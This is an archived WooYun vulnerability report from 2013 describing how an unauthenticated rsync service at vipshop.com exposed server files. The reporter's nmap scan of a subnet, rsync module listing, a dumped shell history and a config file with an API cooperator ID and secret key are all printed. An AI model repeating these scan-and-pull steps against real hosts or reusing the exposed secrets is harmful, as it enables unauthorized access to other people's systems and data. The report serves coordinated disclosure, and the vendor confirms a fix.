乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-01-09: 细节已通知厂商并且等待厂商处理中 2013-01-11: 厂商已经确认,细节仅向厂商公开 2013-01-21: 细节向核心白帽子及相关领域专家公开 2013-01-31: 细节向普通白帽子公开 2013-02-10: 细节向实习白帽子公开 2013-02-23: 细节向公众公开
一个rsync错误设置导致敏感信息泄漏
首先呢,扫同网段啊,rsync很多人都没处理好,ping vipshop.com得到一个网段
nmap 180.186.22.1/24 -p873 --openStarting Nmap 5.51 ( http://nmap.org ) at 2013-01-09 16:24 CSTNmap scan report for 180.186.22.14Host is up (0.0053s latency).PORT STATE SERVICE873/tcp open rsyncNmap scan report for 180.186.22.22Host is up (0.0043s latency).PORT STATE SERVICE873/tcp open rsync
好了发现一些了
rsync 180.186.22.14::m2drwxr-xr-x 4096 2012/11/15 17:35:00 .-rw------- 5433 2012/09/12 13:35:48 .bash_history-rw-r--r-- 33 2012/05/22 17:18:18 .bash_logout-rw-r--r-- 176 2012/05/22 17:18:18 .bash_profile-rw-r--r-- 124 2012/05/22 17:18:18 .bashrc-rw------- 32 2012/07/13 10:42:30 .mysql_history-rw------- 7708 2012/08/20 17:43:59 .viminfodrwx------ 4096 2012/07/13 10:44:56 .elinksdrwxr-xr-x 4096 2012/11/27 00:20:00 360drwxr-xr-x 4096 2012/11/23 18:36:42 configdrwxr-xr-x 4096 2012/09/06 10:27:47 etaodrwxr-xr-x 4096 2012/12/20 00:30:01 filetempdrwxr-xr-x 4096 2012/12/20 00:44:47 logdrwxr-xr-x 4096 2012/12/20 13:33:19 pictemp
cat .bash_history lsllcd /usr/local/tomcat/ls./bin/shutdown.sh netstat -tpln./bin/startup.sh llcd conf/lsvim server.xml cd ..ls./bin/shutdown.sh ./bin/startup.sh tail -f logs/catalina.out netstat -tplnwexitlscd /usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh netstat -tplnnetstat -tplncd /usr/local/tomcat/lstail -f logs/catalina.out vim logs/catalina.out vim /etc/hostshostname exitls/usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh lsnetstat -tplnnetstat -tplnnetstat -tplnnetstat -tplncd /usr/local/tomcat/lscd logs/tail -fn 200 catalina.out lsnetstat -tplnvim catalina.out lscd ..lscd conf/lsvim tomcat-users.xml lsvim server.xml /usr/local/tomcat/bin/shutdown.sh netstat -tpln/usr/local/tomcat/bin/startup.sh tail -f ../logs/catalina.out cd ..lsvim logs/catalina.out vim conf/server.xml lsvim logs/catalina.out vim conf/server.xml lsvim conf/tomcat-users.xml ./bin/shutdown.sh ./bin/startup.sh tail -f logs/catalina.out vim conf/tomcat-users.xml ./bin/shutdown.sh ./bin/startup.sh tail -f logs/catalina.out vim conf/tomcat-users.xml ./bin/shutdown.sh ./bin/startup.sh tail -f logs/catalina.out exexitls/usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh cd /usr/local/tomcat/lscd logs/lstail -f catalina.out wtoptail -f catalina.out tail -f catalina.out /usr/local/tomcat/bin/shutdown.sh cd /usr/local/tomcat/bin/lsvim catalina.sh ls/usr/local/tomcat/bin/startup.sh lscd ..lstail -f logs/catalina.out lscd /data/vipPlatform/lsvim config/vipshop-config.xml lscd ..cd /usr/local/tomcat/bin/lsvim catalina.sh /usr/local/tomcat/bin/shutdown.sh wtop/usr/local/tomcat/bin/startup.sh cd ..lstail -f logs/catalina.out cd /data/vipMobile/config/lsvim vipshop-config.xml cd /usr/lscd cd /usr/local/tomcat/lscd /usr/local/tomcat/lscd webapps/lscd /usr/local/mysql/lscd data/lstop/usr/local/tomcat/bin/shutdown.sh wwwtopdf -hfree -mdf -hvim /etc/my.cnf /usr/local/tomcat/bin/startup.sh cd /usr/local/tomcat/lstail -f logs/catalina.out /usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh tail -f logs/catalina.out /usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh tail -f logs/catalina.out tail -f logs/catalina.out tail -f logs/catalina.out wtoptail -f logs/catalina.out tail -f logs/catalina.out /usr/local/tomcat/bin/shutdown.sh /usr/local/tomcat/bin/startup.sh tail -f logs/catalina.out /usr/local/tomcat/bin/shutdown.sh wwcd /usr/local/tomcat/webapps/lsllnetstat -tplnnetstat -tplnnetstat -tplnls*.war /tmp/mv *.war /tmp/llll/usr/local/tomcat/bin/startup.sh netstat -tplnllrm -rf vipMobilechown -R tomcat.tomcat .cp ../vipPlatform.war .exitllcp /usr/local/tomcat/vipMobile.war /usr/local/tomcat/webapps/cd /usr/local/tomcat/
cat vipshop-config.xml <?xml version="1.0" encoding="UTF-8" ?><vipshop-config> <config name="qqapi"> <publish_to>qq</publish_to> <cooperatorid>855006109</cooperatorid> <secretkey>abcdefghabcdefghabcdefghabcdefgh</secretkey> <add_sku_method>addSKU</add_sku_method> <add_sku_url>http://apitest.buy.qq.com/item/addSKU.xhtml</add_sku_url> <add_sku_detail_method>addSKUDetail</add_sku_detail_method> <add_sku_detail_url>http://apitest.buy.qq.com/item/addSKUDetail.xhtml</add_sku_detail_url> <add_sku_pic_method>addSKUPic</add_sku_pic_method> <add_sku_pic_url>http://apitest.buy.qq.com/item/addSKUPic.xhtml</add_sku_pic_url> <add_sku_stock_method>modifySKUStock</add_sku_stock_method> <add_sku_stock_url>http://apitest.buy.qq.com/item/modifySKUStock.xhtml</add_sku_stock_url> <add_sku_batch_stock_method>batchModifySKUStock</add_sku_batch_stock_method> <add_sku_batch_stock_url>http://apitest.buy.qq.com/item/batchModifySKUStock.xhtml</add_sku_batch_stock_url> <queryDealList_method>queryDealListV2</queryDealList_method> <queryDealList_url>http://apitest.buy.qq.com/deal/queryDealListV2.xhtml</queryDealList_url> <queryDealDetail_method>queryDealDetailV2</queryDealDetail_method> <queryDealDetail_url>http://apitest.buy.qq.com/deal/queryDealDetailV2.xhtml</queryDealDetail_url> <signCheckResult_method>signCheckResultV2</signCheckResult_method> <signCheckResult_url>http://apitest.buy.qq.com/deal/signCheckResultV2.xhtml</signCheckResult_url> <signShip_method>signShipV2</signShip_method> <signShip_url>http://apitest.buy.qq.com/deal/signShipV2.xhtml</signShip_url> <signRecvState_method>signRecvStateV2</signRecvState_method> <signRecvState_url>http://apitest.buy.qq.com/deal/signRecvStateV2.xhtml</signRecvState_url>
危害等级:低
漏洞Rank:3
确认时间:2013-01-11 14:21
感谢提供,已经修复
暂无